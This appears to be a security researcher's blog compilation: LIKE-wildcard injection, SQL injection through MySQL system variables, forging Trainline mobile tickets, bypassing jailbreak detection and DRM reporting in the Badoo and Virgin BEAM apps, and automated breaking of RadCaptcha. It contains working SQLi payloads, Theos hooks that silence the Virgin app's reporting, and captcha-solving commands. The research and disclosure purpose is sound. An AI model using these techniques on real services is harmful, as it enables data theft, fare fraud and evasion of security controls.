The Dangers of ‘L_KE’

TL;DR: This post is about some late-90s-level hacking. But the fact is that there just doesn’t exist a decent explanation of this vulnerability anywhere on the internet… and yesterday, in 2018, I found another application vulnerable to it (to quite serious effect). I’m afraid that was the straw that broke the camel’s back. So now we’re doing this… we’re making the blog post that should have been made 20 years ago. There is a simple zipped-up MySQL/PHP lab at the bottom of this post; feel free to skip to that if you are so inclined.


Let’s talk about a SQL feature that’s been around for longer than I’ve been breathing… the ‘LIKE‘ operator. And how, on a good day, it lets an attacker fingerprint an application’s database and, on a really good day, enumerate content from it.

The issue exists when passing user-supplied data into a SQL ‘LIKE’ operator. e.g:

Select * from `table` where `column` LIKE '{user input}'

For simplicity, let’s assume we are using MySQL and PHP here.

Now, you’ve sanitised your user’s input through mysql_real_escape_string(), and you are using prepared statements for all your site’s queries… that’s good. But did you know that, even while doing both those things, the metacharacters for SQL’s LIKE operator ( _ and % ) still get treated specially? As a reminder:

  • _ matches exactly one character
  • % matches any sequence of zero or more characters

Ergo…

Select * from `users` where `username` LIKE 'daniel'

is the same as:

Select * from `users` where `username` LIKE 'd_niel'

is the same as:

Select * from `users` where `username` LIKE 'd_n%_'

is the same as:

Select * from `users` where `username` LIKE '%'
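The equivalences above, and the defence against them, can be sketched in a few lines. SQLite is used here purely to keep the example self-contained; its LIKE operator honours the same ‘%’ / ‘_’ wildcards and ESCAPE clause as MySQL, and the table/usernames are invented:

```python
import sqlite3

# Self-contained sketch using SQLite, whose LIKE honours the same '%' / '_'
# wildcards (and ESCAPE clause) as MySQL. Table and names are invented.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT)")
conn.execute("INSERT INTO users VALUES ('daniel'), ('admin')")

def search(term):
    # Parameterised, so classic injection is out -- but wildcards still work.
    return [r[0] for r in conn.execute(
        "SELECT username FROM users WHERE username LIKE ?", (term,))]

def search_literal(term):
    # The fix: escape LIKE metacharacters and declare the escape character.
    escaped = (term.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    return [r[0] for r in conn.execute(
        "SELECT username FROM users WHERE username LIKE ? ESCAPE '\\'",
        (escaped,))]

print(search("daniel"))     # ['daniel']
print(search("d_niel"))     # ['daniel']  -- '_' matched the 'a'
print(sorted(search("%")))  # ['admin', 'daniel'] -- everything
print(search_literal("%"))  # [] -- '%' now matches only a literal percent
```

Note that parameterisation kept the input safely inside the string literal, yet the wildcards still changed the query’s meaning; escaping them (and declaring the escape character) is what actually neutralises them.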

So, you have identified an application where you are injecting into a LIKE query… now what? What can we do?

Fingerprint the DB

MySQL isn’t the only database to use LIKE metacharacters: MS Access uses ‘?’ instead of the underscore, and even NoSQL databases have equivalents to the LIKE operator; MongoDB’s find() actually supports full PCRE. In any case, the take-home is that search fields are often an interesting place for fingerprinting a database stack. A script which works through a decision tree of accepted metacharacters could fingerprint common databases easily, and is left as an exercise for the reader.

A lot of web applications officially expose the use of wildcards in their searches to users, for example with ‘?’ or ‘*’ characters. These characters are often directly substituted for the DB’s native ones behind the scenes, so you can often still fingerprint the DB from the search’s behaviour, even with these odd characters.
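As an illustrative starting point for such a decision tree (the probe patterns and the behaviours they imply are assumptions you would verify per target, not an authoritative fingerprint set): each probe searches for a record you know exists, e.g. the user ‘daniel’, and you record whether it came back.

```python
# Illustrative only: `matches` maps each probe string to whether the known
# record ('daniel') was returned when that probe was submitted as a search.
def guess_backend(matches):
    if matches.get("d_niel") and matches.get("d%l"):
        return "ANSI LIKE wildcards (MySQL, PostgreSQL, SQL Server, ...)"
    if matches.get("d?niel") and matches.get("d*l"):
        return "MS Access-style wildcards"
    if matches.get("d.niel") and matches.get("d.*l"):
        return "regex-based search (e.g. MongoDB)"
    return "unknown / wildcards filtered"
```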

See potentially interesting result-sets

  • You may be able to see all results in one hit (using ‘%’ or an empty string). Silly as it is, even in 2018 this is usually more taxing on databases/applications than the developers had budgeted for, and might cause a denial of service… so be careful.
  • You may be able to find the shortest and longest (in string length) content by incrementing ‘_’ characters until the first and last result-sets are found.

Often, in queries where you are searching through a lot of data, you might find that unusually large or unusually small results (in string length), or ones which contain non-standard characters or formatting, will be test entries you probably weren’t really supposed to see. E-commerce sites often have test/dummy products that will stand out like this.
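A minimal sketch of the length-enumeration trick above, again simulated against SQLite (in a real test, count_of_length() would be an HTTP request to the target’s search feature, and the table contents here are invented):

```python
import sqlite3

# Simulated target: the invented 1- and 13-character entries play the role of
# the test/dummy data that stands out in real result sets.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT)")
conn.executemany("INSERT INTO products VALUES (?)",
                 [("X",), ("TEST",), ("PlayStation 4",)])

def count_of_length(n):
    # '_' * n matches only values exactly n characters long
    return conn.execute("SELECT count(*) FROM products WHERE name LIKE ?",
                        ("_" * n,)).fetchone()[0]

lengths = [n for n in range(1, 50) if count_of_length(n)]
print(lengths)  # [1, 4, 13] -- the unusually short/long outliers stand out
```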

Understand the query structure and DB schema better 

Suppose you are black-box testing an e-commerce application where you can search for a product. You don’t know if you are supposed to type in the product’s code (‘#9051202716-23’), its name (‘Sony PlayStation 4’), the product’s genre (‘games console’), or part of the product’s description (‘successor to the PlayStation 3’) to get results. It might be that your LIKE query actually searches through all of these things. Rather than making assumptions about what our input should look like, we can trivially enumerate this (via brute force) and better understand the application’s database schema.

Get all possible queried data

On an application which reflects all queried column data, dumping all that information might be as simple as typing an empty string or a percent sign. And if not all queried column data gets reflected back, then we can likely still brute-force those values and get them that way.

It might be that the application searches 10 different columns but will only display the number of results found. Even in this extreme case, with some efficient automation we can brute-force all of the queried columns’ data. In the context of an e-commerce site searching products this may not be a problem, but an application should never let you search against something that it is not prepared to show you, or that you don’t have access to see; I’ve seen far worse cases.
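A sketch of that extreme case: the application reveals only whether a search matched anything, yet a character-by-character brute force still recovers a searched-but-never-displayed column. SQLite and the column/value names are invented stand-ins for illustration:

```python
import sqlite3
import string

# Simulated blind scenario: the app searches a hidden 'secret' column but
# reveals only whether anything matched.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT, secret TEXT)")
conn.execute("INSERT INTO products VALUES ('widget', 'hunter2')")

def oracle(pattern):
    # Stands in for "did the search page report any results?"
    return conn.execute("SELECT count(*) FROM products WHERE secret LIKE ?",
                        (pattern,)).fetchone()[0] > 0

def extract(alphabet=string.ascii_lowercase + string.digits):
    value = ""
    while True:
        for c in alphabet:
            if oracle(value + c + "%"):   # does any row start with value+c?
                value += c
                break
        else:
            return value  # no character extends the prefix: we're done

print(extract())  # hunter2
```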

I’ve made a lab to demonstrate exploitation in a semi-realistic scenario, called ‘BlackHat Books’. Feel free to download it and let me know if you get the flag.

blackhatbooks.zip

 

Much Badoo About Nothing

This is just a short post about toying with the Badoo app for iOS, but it also touches on something ever-so-slightly useful about testing the app-upgrade mechanisms of mobile apps. “Urghh, more dating-app hacking,” I hear you say. I know, I know, this is getting old. At some point I’ll get a real hobby, I promise.
As of version 5 of Badoo, which has been out for a while now, two things happened. Firstly, they added a forceful crash upon jailbreak detection that I couldn’t be bothered to circumvent… because, secondly, they remade the UI from scratch and I don’t like unnecessary changes in my life. Na-uh.
Jailbreak detection routines for older Badoo versions have been a bit laughable. You have had:
-(BOOL)jailbroken in class GADDevice,
+(BOOL)deviceIsJailbroken in class FlurryUtil and, finally…
+(BOOL)appIsCracked, also in class FlurryUtil.
These are such common methods/classes that xCon will automatically patch them out and you might never have even known they existed. But they did.
So, I already HAD a solid app which I liked and which worked… why can’t I just keep using it? Using App Admin from Cydia, or AppCake, let’s downgrade to the latest release of the 4.x branch. App Admin thinks this is 4.57.4 and AppCake thinks this is 4.9.
4.9 seems suspiciously high. I’m always wary of AppCake; I wouldn’t be surprised if this is a maliciously modified binary… but oh well, let’s install it anyway! (Mr Optimistic).
Well we are back to the glory-days of the orange Badoo icon, but this happens when you open < v5.0 of the app today:

Apparently it’s time to update

Oh no! A version check and a view which tells us to go away and upgrade. Daniel is sad 😪
Ok well… I very much doubt the devs at Badoo are doing per-app-version API keys and burning those keys used for older, now unsupported, app versions. And I doubt the app’s API calls or endpoints have changed since the V4 days either. Sooooooo… we just need to force the V4 app to work again, right?

*cracks knuckles*.

OK guys. Some very technical, next-level shit is about to go down in Cycript. I’m not sure your eyes can withstand the eliteness of what they are about to see…

root# cycript -p $(ps -A | grep "Application" | grep "Badoo" | cut -d' ' -f2)
cy# [UIApp.keyWindow setHidden:YES]

*wipes sweat away from face with forearm and presses enter*

“Sign in with Facebook”

The upgrade view has been hidden and we’re at the default “Sign in with Facebook” login – Looks good so far.

Let’s see if it works…

Victory! ( Ginger Morticia aside).

Yup. That’s really it. Underneath the top-level “please upgrade” view (think webpage z-indexes) the app is just chilling there, perfectly functional.

I suppose for a dating app the ramifications here are pretty “meh”, but I have seen the same “throw an upgrade page over it” technique used to prevent use of an outdated (and vulnerable) MDM application on iOS… which is totally uncool. When you are testing iOS apps, try to download a few older versions, time permitting, and see exactly what prevents them from functioning. If you can get these working, you might have an easier time introspecting them than the more modern versions with all the security bells and whistles (such as cert pinning and jailbreak detection).

-Hiburn8

"App Forgery" – A Modern Take on The World's Second-Oldest Profession

In this (pretty long) post, I’m going to attempt to coin a name for an application vulnerability, most commonly found in mobile apps. This is “App Forgery”.
I’ve decided it’d be better to explain the details of this vulnerability using a report-style write-up for an example, real, vulnerable app.
I’ve picked the first app that came to mind which is vulnerable to app forgery: the “Trainline” app for iOS. The app allows travellers in the UK to purchase digital train tickets and, in this instance, app forgery allows Mr Bad Guy the ability to travel for free indefinitely.
Trainline app usage (skip ahead if you’ve used the app a few times):
For the unfamiliar, basic usage of the app is this: you link your bank card, tell the app where you want to go, type in the 3-digit CVC from the card and you can now download a mobile ticket (which they insist on calling an “mTicket”). An mTicket shows all of the travel information you would find on a normal ticket and is even designed to look a little like a traditional physical one. You tap “activate” on that ticket the day you want to use it and it goes from greyed-out and static to coloured-in and animated, showing that it’s active.
The guts of an mTicket are displayed across two views in the app, which are toggled via a “UISegmentedControl” (a two-option toggle).

QR Code (left) / Traditional ticket representation (right)

View one shows a QR code which contains all of the train ticket information. Scanning this QR code with a device provides the only realistic means to easily validate information contained on the mTicket, since inspectors don’t have the time or means to validate tickets manually from the visual portion of the ticket. After scanning the code, the handheld devices I have seen appear to light up either green for “valid” or presumably red for “invalid”.
View two contains a visual representation of a traditional ticket, with journey and ticket details. The current time scrolls from left to right in <marquee> fashion, against a background made from three different colours. These colours differ for each journey and there is no discernible way to determine a journey’s colours prior to activating a ticket. In theory, inspectors on any train should be aware of the “correct colours” for that journey and spot a fake ticket. The fact the current time shown on the ticket scrolls also thwarts people attempting to share tickets via screenshots/video.
Basic introduction to the app out of the way, here’s the write-up for App Forgery.


MEDIUM – “App Forgery” Possible

Summary
It is possible for an unlawful person to create a forged/counterfeit Trainline application and mTickets, allowing the forger to travel on trains for free.
Finding
It was found that mTickets created within the application are almost always incorrectly validated¹; with validation occurring based on the physical appearance of mTickets, rather than a proven tie between data on a passenger’s mTicket and server-side data.
Typical mTicket validation pre-boarding a train normally involves scanning the mTicket’s QR code at a barrier to allow passing through it. If, for any reason, the mTicket fails to validate, validation will fall back to the ticket being inspected manually by nearby staff.  Alternatively, some stations without these barriers only perform manual inspection, and many smaller stations perform no ticket checks at all prior to boarding. Then, at some point during the journey, additional ticket checks are often performed by an on-board ticket inspector, using a handheld device for scanning the QR code on mTickets. This device is often unavailable to inspectors, also resulting in mTicket validation being performed manually.
Manual mTicket inspection consists of the inspector assessing, by eye, the physical appearance of the second (non-QR-code) view of the mTicket. This portion of the mTicket contains no piece of information which the inspector can use to appropriately validate it, given their time and resources². This permits anyone with moderate iOS development skill the chance to create forgeries of the Trainline app/mTickets.
Exploitation
As a proof of concept, the Trainline app’s mTicket section was forged from scratch. The process took around 5 hours, which mainly consisted of determining some of the assets in use in the real Trainline app, such as fonts, and the exact positioning of UI elements.

Trainline app forged in Xcode

Legitimate Trainline app VS forgery

The QR code and background colours of the current-time area will of course be invalid on any forgery, although these are so infrequently checked that it really does not matter. When the QR code fails to validate at barriers or, on rare occasion, on a train… the likely outcome is that inspectors will briefly assess the right segment of the mTicket and allow the passenger to continue travelling.
For this particular app forgery, it was designed such that each of the journey details on the mTicket behaves like a text field and is modifiable by tapping on it. This allows a forger to easily recreate the appearance of any journey details they wish and travel on that journey for free.
Some of the considerations/context which resulted in this issue being attributed with a “Medium” severity risk rating were:

  • The attack does not rely on any server-side processing, and is therefore difficult to detect.
  • In theory, a person could purchase a legitimate ticket, note the ticket’s QR code and colours, refund the ticket and implant these into a forged app, recreating a more legitimate-appearing ticket.
  • The level of social engineering involved is minimal: inspectors who are able to spot errors in a forged app are unlikely to assume anything untoward and, at worst, would likely accept the ticket as the result of an error within the legitimate app.
  • The barrier to creating a forged app is relatively high, although one could be easily shared/distributed afterwards.

Remediation

  1. mTickets should be validated only by way of the QR code; there is currently no appropriate alternative within Trainline mTickets. This will likely involve greatly increasing the number of QR code scanners available to station and on-board ticket inspectors.
  2. Consider a revision/upgrade to the handheld QR code scanners. These devices do not appear to offer the inspector enough verbosity to determine whether a scanned QR code is fake, previously scanned, expired, or erroneous. These devices, if network-connected, should be able to provide this information to help catch and deter forgeries.

Citations
1. This has been determined from the personal experience of the tester, having used the application for a number of years. This does not account for other users’ experiences.
2. A small mitigation against app forgery does exist by way of the coloured background where the current time is displayed. These colours change depending on journey details and should provide a means for inspectors to spot suspicious tickets. However, from experience discussing this feature with inspectors, staff are usually unaware of the correct colours for their journey.


Hopefully this explains things well enough to help you spot and report on app forgery vulnerabilities in the future.
-Hiburn8
 
 

The Happn'ing

Years ago, one of the first posts I ever wrote was about my experience scripting a bot for the dating site OKCupid. It was just a PoC bashed together over a few beers with a friend.
Since then (and becoming single) I’ve scripted bits and bobs for virtually every major dating site/app… it’s become a bit of a weird hobby.
A while ago I wrote a reasonably feature-filled script for managing a user account on the dating app Happn, imaginatively called “Happn.py”. It was immediately spotted by a few Happn employees on my GitHub, who starred the project, but then prevented it from actually working by blocking the Python user-agent on the Happn servers. I made the repo private and updated it to work again, with the intention of spending some more time developing it. That time never really came, and I stopped using Happn a while ago, so I’ve made the tool public and this is just a quick post to share it.
It comes with command-line options to manage just about everything you can do within the app, as well as a few naughty/fun things to play with… such as the “warandpeace” exploit, which crashes the Happn app of a victim/target account. If you’re struggling to manage your 5k Happn bot swarm I can’t imagine writing a wrapper for this would be particularly hard 😉
https://github.com/hiburn8/happn.py

Ready the Anti-BEAM Beam! Breaking the Virgin BEAM app in 12 minutes

I’ve been travelling on Virgin trains a lot recently and finally decided to take a look at their free movie-streaming app “BEAM”.
Super-excited to be about to watch Forrest Gump on my journey, I found that whenever I hit play, the app’s custom video player decided to freeze and eventually crash the app on my device of choice: an iPhone 6s.
Determined to watch Hanks’ award-winning performance, I looked at the device’s system log for clues. This revealed that, while the BEAM app’s process was in its final moments in this world, the words “Jailbreak Detected” were logged.
Interdasting.
Throwing the app into Hopper and searching for “Jailbreak Detected” shows the following line:

This indicates that the handleNotification method of class CapmediaDrmVideoViewController1 is likely responsible for creating the syslog entry. “DRM”? Yeah, that sounds about right. On the off-chance this method is also responsible for the jailbreak-detection routine, let’s just hook that method and null it using a Theos tweak:

%hook CapmediaDrmVideoViewController1
- (void)handleNotification:(id)no{
}
%end

compiling. compiling… compiling…
open BEAM -> click Forrest Gump -> click play ->

Yep, that works. Bypass done 🤠 stop the clock.
Looking at the network traffic for the app afterwards, I noticed that a Virgin-owned domain was being POST’d to with an “errorid” parameter every time I opened a video. This didn’t stop the app from working but was clearly updating Virgin about my jailbreak. This told me that, actually, handleNotification didn’t do the detection routine itself… but was probably responsible for causing the purposeful crash afterwards. So while the app knew it was jailbroken and was able to dial home and tell mom… it wasn’t able to force-quit. We hadn’t zapped the problem at its root, just kinda circumvented it.
In theory, some 31337 virgin… employee (I couldn’t help myself) would be able to put two and two together, noticing that my phone had purportedly crashed, but was still able to successfully stream the entirety of Tom Hanks’ back-catalogue, and infer a bypass had been made; potentially leading to a revised security mechanism in a future update. We can’t have that!
A cheeky class-dump reveals that the CapmediaDrmVideoViewController1 class also has a sendPostRequestForPlaybackError method. Honestly people, it doesn’t get any easier than this. Let’s null this guy too:

%hook CapmediaDrmVideoViewController1
- (void)sendPostRequestForPlaybackError:(id)err{
}
- (void)handleNotification:(id)no{
}
%end

compiling. compiling… compiling…
So now the app is both bypassed and flying under the radar 🙌
This really isn’t good enough Virgin.
Lessons for your developers:

  • Don’t log things that don’t need logging. (“Jailbreak Detected” 🤦)
  • Ideally, don’t detect a jailbreak with one routine and do something about it in another.
  • Do your JB detection at the start of application launch! The biggest deterrent for me trying to bypass an app’s JB-detection, is repeatedly watching the app crash before the app’s launch-screen has even ended. I’ll give up if it happens enough.
  • Don’t just force-crash/exit() when you detect a jailbreak… start crippling the app from the inside. Delete critical app files so it won’t work again, or set flags which force the app into a code path that prevents it from working, and store them somewhere that’ll persist even if the app is deleted and re-downloaded (à la the keychain). Be sneaky. Very sneaky.

 

PentestCTF – Another CTF Framework

Instead of doing my final-year project at University, I made (another) open-source CTF/Lab framework, primarily for my own learning benefit during its development, but also because I realised how powerful a group learning environment like a CTF is and I wanted to deploy one at my University.
It’s pretty much the same as all the others I’ve seen, although it has a few extra features. Namely:

  • The ability to detect when its own labs are down and show that on the labs page.
  • It has its own accompanying iOS app. Flags from iOS labs can automatically open the main PentestCTF app and submit them.
  • An API. Make your own CLI tool or interface for it, see if I care.
  • A good/simple schema. A lot of CTFs have messy schemas and small improvements to the app are a bit of a headfu** to implement.
  • Achievements. There are only a few added by default, but they are there and you can make rules to add new ones.
  • Admins don’t need to give you a default password or let you type a password into their “super-user” session. They just send you a link with a token to create your account yourself, and you request another link with a token to make any changes to your account.
  • Game modes. So, the idea is that you instigate a “game mode” to get people in the hacking mood if things slow down. You can create bonus points for things like “most improved over a month” or “most scoreboard overtakes”.

A demo of the site should be live on PentestCTF.com if you want to take a look. Contact me if you want the source. FYI: on the demo site, the labs were thrown on there from various sources: @Strawp, a BAE CTF in 2015 and my friend Guga, who has no online presence… props to those guys.

JTAGulator 3D Printed Case

Super-quick post.
I 3D-printed a case for my friend’s JTAGulator and it came out pretty well, so I thought I’d share. The JTAGulator project provides 2D drawing/design files to easily cut out an acrylic case for the board (JTAGulator: Acrylic Case Assembly), so I just stencilled over that in CAD software, extruded the two (top/bottom) pieces an eighth of an inch and traced the JTAGulator logo onto the top face.
The files are scaled to inches rather than mm so if, like me, you use a slicer like Cura that talks in mm, you will need to scale the model in Cura/whatever by 25.4.
The writing isn’t very tall, so make sure you’re quick to pause the print and swap filament if you want the text to be a different colour.
OBJ & SketchUp files: jtagulator_case_3dprint
Top
screen-shot-2016-12-07-at-15-58-30 screen-shot-2016-12-07-at-15-59-40
Bottom
screen-shot-2016-12-07-at-16-02-44

SQL Injection using System Variables in MySQL

For BSides Manchester 2015 the UK pen-testing company aptly named ‘Pentest’ held a SQL injection challenge where the injection point required structuring the payload in a specific manner with MySQL voodoo to keep the payload under 90 characters, and bypass a basic WAF.
I was fairly certain the lab could also be completed using MySQL variables, but I was unable to get the job done. Lo and behold, it totally was possible; it turned out I had overcomplicated the solution, which they revealed could be achieved with the following:

http://bsides-2015.pentest-challenge.co.uk/?search='or@:=(select table_name
    from information_schema.tables limit 40,1)union select 1,2,@%23

This was something I’d never looked at before, and it just didn’t cross my mind to store the query result and retrieve it via a variable in one hit using a UNION. I was trying to do this over two queries, and therefore my variable would always be empty/null when I tried to retrieve it: MySQL user variables are scoped to a session (a single database connection), and they disappear once the application closes its connection after the first query completes.
This led me completely down the wrong rabbit hole trying to solve the challenge, but also into discovering something reasonably interesting: SQLi with system variables.
OK, so this is effectively a new technique of SQLi, specific to MySQL (I think). However, it’s also most often useless, since it requires one of two rather outlandish conditions to be met for an application to be exploitable via this method, both of which would usually mean that the application can be exploited much more trivially. These conditions are:

  • You need to be able to inject at the very beginning of the query

OR (as was pointed out to me by SQLMap’s Miroslav Stampar)

  • The MySQL database needs to be configured to allow stacked queries

In the event you can do this, though, this method should provide a few benefits over a more traditional SQLi technique:

  1. The ability to inject into small input-length areas
  2. The ability to execute arbitrarily long queries into these areas
  3. The ability to bypass a decent amount of WAFs or poor SQLi defence mechanisms (blacklists)
  4. The ability to add a level of stealth to an otherwise fairly obvious attack
  5. The ability to make forensic analysis of the attack potentially more complicated

OK, so if you read the MySQL system variable reference documentation, you’ll see that there are a lot of these SYSTEM variables which alter the configuration of the database. 40 of these variables hold string values and are either a GLOBAL (permanent) variable or can be set as either a GLOBAL or SESSION variable.
The online reference doesn’t say what the constraints are on each of these 40 SYSTEM/GLOBAL string variables, and I soon found that some only accept specifically formatted string data and that others are capped to short lengths… so I made a short application which just tried to set each one to a longer and longer arbitrary string, to find out which of these variables could be used to store arbitrary, and arbitrarily long, string data.
It turns out there is just one SYSTEM/GLOBAL variable out of the lot which is fit for this purpose and won’t break MySQL if you fill it with crap => init_slave
My idea was not to store the result of a query within the init_slave variable and then select it, like in the BSides challenge, but to actually store a query there, then prepare and execute it.

SET GLOBAL init_slave='select table_name from information_schema.tables limit 40,1';
PREPARE stmt1 FROM @@init_slave;
EXECUTE stmt1;
DEALLOCATE PREPARE stmt1;

If you can inject the above queries into an application, you ultimately run the contents of init_slave.

select table_name from information_schema.tables limit 40,1

Because neither prerequisite was met for these types of queries to work in the challenge, I gave up on this line of thinking. Although, for fun, I revisited it afterwards to see what would have been possible if those prerequisites were met.
In the event user input is restricted via a basic WAF or similar, like in the challenge, the blocked SQL keywords might render the injection point realistically unexploitable. We can potentially get around this scenario with some creative concatenation:

SET GLOBAL init_slave="selec"
SET GLOBAL init_slave=concat(@@init_slave,"t fro")
SET GLOBAL init_slave=concat(@@init_slave,"m information_schem")
SET GLOBAL init_slave=concat(@@init_slave,"a.table")
SET GLOBAL init_slave=concat(@@init_slave,"s limi")
SET GLOBAL init_slave=concat(@@init_slave,"t 40,1")
PREPARE stmt1 FROM @@init_slave;
EXECUTE stmt1;
DEALLOCATE PREPARE stmt1;

All we need to get past the filter is “SET”, “GLOBAL”, “CONCAT”, “PREPARE” and “EXECUTE”. That’s a fairly reasonable ask.
In the event our input is also length restricted, again like the challenge, we can take this method to the extreme and concat a single character at a time.

SET GLOBAL init_slave="selec"
SET GLOBAL init_slave=concat(@@init_slave,"t")
SET GLOBAL init_slave=concat(@@init_slave," ")
SET GLOBAL init_slave=concat(@@init_slave,"*")
SET GLOBAL init_slave=concat(@@init_slave," ")
SET GLOBAL init_slave=concat(@@init_slave,"f")
etc...

The longest required query for this method when adding one character at a time is 46 characters; almost half of the BSides challenge. Although in reality your payload will need a bit of manipulating to fit the particular injection point.
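The chunking above lends itself to automation. A hypothetical helper to generate those payloads for a given length limit (the wrapper strings come straight from the queries above; escaping of double quotes inside the smuggled query is deliberately ignored in this sketch):

```python
# Wrapper strings taken from the SET GLOBAL / concat() queries above.
PREFIX_FIRST = 'SET GLOBAL init_slave="'
PREFIX_NEXT = 'SET GLOBAL init_slave=concat(@@init_slave,"'

def chunk_payloads(query, limit):
    overhead = len(PREFIX_NEXT) + len('")')      # worst-case wrapper length
    step = max(1, limit - overhead)              # chars smuggled per request
    chunks = [query[i:i + step] for i in range(0, len(query), step)]
    payloads = [PREFIX_FIRST + chunks[0] + '"']
    payloads += [PREFIX_NEXT + c + '")' for c in chunks[1:]]
    payloads += ["PREPARE stmt1 FROM @@init_slave;",
                 "EXECUTE stmt1;",
                 "DEALLOCATE PREPARE stmt1;"]
    return payloads

demo = chunk_payloads("select table_name from information_schema.tables "
                      "limit 40,1", 46)
print(max(len(p) for p in demo[:-3]))  # 46 -- one character per concat()
```

With a limit of 46, each concat() payload carries exactly one character, which lines up with the worst-case length mentioned above.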
The only issue with this technique is that it would require a lot more requests to be made to the application; which may or may not be an issue.
However, this could be seen as a positive, since being able to trickle one relatively dumb-looking payload per week to a vulnerable application could help the attack go unnoticed.
Ultimately, this is a rather obscure method of SQLi, but it might be the only available method in some extreme edge-cases. So it might be worth adding it to the memory banks for a rainy day.
A ‘FIX’?
At first I wasn’t convinced this was a bug which needed fixing, and that it might just be abuse of normal operations. The more I think about it though, the more ridiculous it seems to me that SYSTEM variables can be used in a prepared statement in the first place. I’ve found no legitimate use-case for this whatsoever.
Since the init_slave value cannot be copied into a SESSION variable and then executed over two queries (the variable would be empty), we only have to worry about preventing init_slave (or any other ‘vulnerable’ SYSTEM variable) from being used as part of a prepared statement. So a fix could easily be created by prohibiting that from happening.
Edit: I’ve submitted a MySQL bug report, with the above as the recommended behaviour: http://bugs.mysql.com/bug.php?id=81986. Let’s see if it gets laughed at.
Edit 2: As expected, the powers that be at MySQL/Oracle refused to acknowledge this as a bug in MySQL, let alone one with security implications (because executing system-configuration strings as a query is a solid feature, right?). The full transcript of the communication is here: 81986. I pretty much did a mic-drop at the end; there could be more correspondence from Oracle, but I won’t be bothering to look. It’s probably the only time I’ll ever submit anything directly to them. The process was slow and painful, and the engineer assigned to my case was the human embodiment of why we have vulnerable software.
-hiburn8
 
 
 

Gotta Captcha'm All – Automating Image (and Audio!) Captchas.

A captcha serves one purpose. To ensure that a human has performed a task, and not a machine.
In web applications, they attempt to prevent attackers from creating automated bits of code to brute-force forms, fuzz user input or cause a denial of service.
It’s very much a non-trivial task these days to differentiate the man from the machine using these image (and sometimes audio) “challenges”, as the logical steps a human brain takes to decipher characters from a captcha can almost always be replicated, often more effectively, in code. The types of people you deploy a captcha to shield yourself against are unlikely to be thwarted by something that can be programmatically broken. You’re often just adding another hurdle with a captcha. Some people like hurdles.
With this in mind, if you have chosen to use a captcha to protect a mission-critical application from attack… I am of the opinion you’re already a little bit screwed. A captcha is suitable for stopping a casual WordPress blog like this from being overrun by spam comments from knock-off Barbour jacket merchants, nothing more.
On a recent test, a mission-critical application for a bank was indeed vulnerable to a nasty DoS, enabled by its use of the ‘RadCaptcha‘ captcha system, which is built into the commercial Telerik .NET framework. It’s a particularly crappy captcha. A previous pentest from another company had already highlighted this, but without a demonstration of how it could be broken, the bank were reluctant to swap it out.
For the rest of this post, I’ll detail some of the steps I took, and tools I used, to create a PoC for bypassing Telerik RadCaptcha. At the end of it you should have a reasonable idea of how to incorporate captcha-beating functionality into your own scripts. The secondary take-home should be to not use RadCaptcha.
A RadCaptcha protected form typically incorporates both an image captcha, and alternative audio captcha for the visually impaired.
The image captcha looks like this:
Imgcaptcha.jpg

…and the audio captcha sounds like this:

RadCaptcha_Audio_4ec6deb0.wav

Right, let's break these bad boys, starting with that image captcha.
Here are some of the problems with it:

  • The characters are evenly spaced (the image can be perfectly divided into five segments of 55 pixels in width, each containing one character). In an ideal world the characters would be unevenly spaced, to make the process of determining where characters start and end more complex for a program. Most OCR tools designed to break captchas won't have a problem figuring this out, but if they did, we could programmatically chop the image into five segments and perform OCR on each character separately.
  • The image only seems to have two colours: white and a shade of grey. If character edges are coloured similarly to their backgrounds, it can be tricky for OCR tools to distinguish them.
  • The “dust” effect is terrible. Tiny speckles, none of which obstruct the characters in any way.
  • No other effects. No lines scrawling all over the text, nothing.
  • Character warping. There basically is none. It just looks like a quirky font :/

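If an OCR tool ever did struggle with segmentation, the even 55-pixel spacing makes the fallback trivial. A minimal sketch of the box arithmetic in Python (pure stdlib; the actual cropping would come from an image library such as Pillow's Image.crop, which takes exactly these boxes):

```python
# Sketch: divide the 275px-wide captcha into five 55px character segments.
# Each (left, top, right, bottom) box could be fed to an image library's
# crop function before OCRing each character separately.
SEG_WIDTH = 55   # from the observation above: five even 55-pixel segments
NUM_CHARS = 5

def char_boxes(height):
    """Return one crop box per character for a captcha of the given height."""
    return [(i * SEG_WIDTH, 0, (i + 1) * SEG_WIDTH, height)
            for i in range(NUM_CHARS)]

print(char_boxes(50))
# → [(0, 0, 55, 50), (55, 0, 110, 50), (110, 0, 165, 50),
#    (165, 0, 220, 50), (220, 0, 275, 50)]
```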
Step 1 – While the image is basically made of two colours anyway, let's convert it to a greyscale .pnm file. Most OCR tools like working with .pnm files but don't include the ability to do the conversion themselves:

djpeg -pnm -grey Imgcaptcha.jpg > Imgcaptcha.pnm

Step 2 – Install gocr (one of many free OCR tools for *nix) and read the manual:

apt-get/brew install gocr && man gocr

Step 3 – Win:

gocr -d 50 -C a-zA-Z0-9 -a 85 -m 16 -i Imgcaptcha.pnm

The -d 50 tells gocr to attempt to remove clusters of pixels less than 50 pixels in size (the "dust"). This completely removes the effect.
-C a-zA-Z0-9 defines the character set to use, which should aid accuracy.
-a 85 specifies the certainty level we want for a character. If our output from this command contains fewer than 5 characters, we know there was a less-than-85% chance that one or more characters were right, so we can skip that captcha and grab another one. Although you can ramp it up to about 95 with RadCaptcha and never miss a character (doh).
-m 16 tells gocr to work in a mode whereby it won't attempt to separate overlapping characters. Since there won't ever be any in RadCaptcha, this could improve things.
Done. We can turn this process into a one-liner and integrate it into any tool we want to attack a RadCaptcha form. Absurdly easy. Daniel 1 – Telerik 0.
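The "fewer than five characters means skip and grab another" logic wraps up in a few lines. A sketch, with the captcha-fetching and djpeg|gocr steps injected as callables so the control flow stands on its own (the real versions would shell out to the commands above):

```python
import re

def solve_captcha(fetch_image, run_ocr, max_tries=10):
    """Keep grabbing captchas until gocr returns five confident characters.

    fetch_image() should download a fresh captcha image; run_ocr(image)
    should run the djpeg | gocr pipeline above and return its text output.
    """
    for _ in range(max_tries):
        # Drop anything outside the -C character set (whitespace, '_' etc.)
        text = re.sub(r"[^A-Za-z0-9]", "", run_ocr(fetch_image()))
        if len(text) == 5:   # all five characters beat the -a threshold
            return text
    return None              # too many low-confidence captchas in a row

# Stubbed usage: pretend the first captcha came back unreadable.
outputs = iter(["a_c1", "Xk29Q"])
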